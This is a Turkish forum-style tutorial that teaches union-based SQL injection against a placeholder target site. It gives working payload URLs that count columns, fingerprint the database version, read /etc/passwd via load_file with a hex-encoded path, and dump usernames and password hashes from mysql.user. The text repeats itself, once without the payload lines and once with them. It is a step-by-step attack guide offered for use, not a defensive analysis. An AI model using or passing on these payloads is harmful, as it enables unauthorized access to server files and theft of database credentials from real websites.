SQL İNJECTİON DUMP PASSWORD;
Merhaba arkadaşlar bu konumda belki hiç görmediğiniz bir yöntemden bahsedeceğim.
SQL injection açığı ile olan yerden "/etc/passwd" okuyabileceğiz.
Öncelikle hedef sitemizde me ta-Karakter sorgulamızı yapıyoruz ve hatamızı alıyoruz.
2.ci olarak devam edip "order by" komutunu uyguluyoruz. Arıyoruz,Arıyoruz ve bulduk diyelim.
Şimdi kolon sayımızı bulduk arkadaşlar "9" ilk önce bir deneme yapalım. Tabi her zaman ki gibi "union select"
komutu ile arkadaşlar
yapıyoruz ve ekranımıza değerimiz geliyor. "4" diyelim.
şimdi ilk olarak
diyerek sitenin versiyon numarasını öğreniyoruz ve doğrulama yapıyoruz.
Şimdi önemli olan yerimize dönelim;
kodumuz budur arkadaşlar fakat çalıştırmadan önce vurgulamak
istediğimiz yeri hex koduna dönüştürmemiz gerekiyor değil mi ? "2f6574632f706173737764" hex kodumuzu alıyoruz ve hexli olarak ekliyoruz ;
şimdi çalıştır diyoruz ve farkederseniz hex kodumuzun
önüne "0x" değerini atıyoruz bu sabit bir değerdir takılmayın pek arkadaşlar. Şimdi çalıştırdığımız da arkadaşlar ekran'a "passwd" dosyasını okuyup yansıtacaktır.
...vs vs uzun bir şeydir aslında örnek vermek için kısa arkadaşlar.
Şimdi işimize devam edelim ve bir yandan da "passwd" dosyasını kaydedelim bir yere.
komutunu uyguladığımız taktirde ekrana
root kullanıcısının şifreleri ve username bilgileri yansıyacaktır.
Bu konuda burda sona erer. Vesselam arkadaşlar..
Merhaba arkadaşlar bu konumda belki hiç görmediğiniz bir yöntemden bahsedeceğim.
SQL injection açığı ile olan yerden "/etc/passwd" okuyabileceğiz.
Öncelikle hedef sitemizde me ta-Karakter sorgulamızı yapıyoruz ve hatamızı alıyoruz.
2.ci olarak devam edip "order by" komutunu uyguluyoruz. Arıyoruz,Arıyoruz ve bulduk diyelim.
Kod:
"site.com/index.php?id=-1 order by 10--"komutu ile arkadaşlar
Kod:
"site.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8,9--"şimdi ilk olarak
Kod:
"site.com/index.php?id=-1 union select 1,2,3,version(),5,6,7,8,9--"Şimdi önemli olan yerimize dönelim;
Kod:
"site.com/index.php?id=-1 union select 1,2,3,unhex(hex(load_file(/etc/passwd))),5,6,7,8,9--"istediğimiz yeri hex koduna dönüştürmemiz gerekiyor değil mi ? "2f6574632f706173737764" hex kodumuzu alıyoruz ve hexli olarak ekliyoruz ;
Kod:
"site.com/index.php?id=-1 union select 1,2,3,unhex(hex(load_file(0x2f6574632f706173737764)),5,6,7,8,9--"önüne "0x" değerini atıyoruz bu sabit bir değerdir takılmayın pek arkadaşlar. Şimdi çalıştırdığımız da arkadaşlar ekran'a "passwd" dosyasını okuyup yansıtacaktır.
Kod:
"root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/sbin:/nologin"Şimdi işimize devam edelim ve bir yandan da "passwd" dosyasını kaydedelim bir yere.
Kod:
"site.com/index.php?id=-1 union select 1,2,3,group_concat(User,0x3a,Password,0x3a,file_priv),5,6,7,8,9 from mysql.user--"root kullanıcısının şifreleri ve username bilgileri yansıyacaktır.
Bu konuda burda sona erer. Vesselam arkadaşlar..
Son düzenleme:
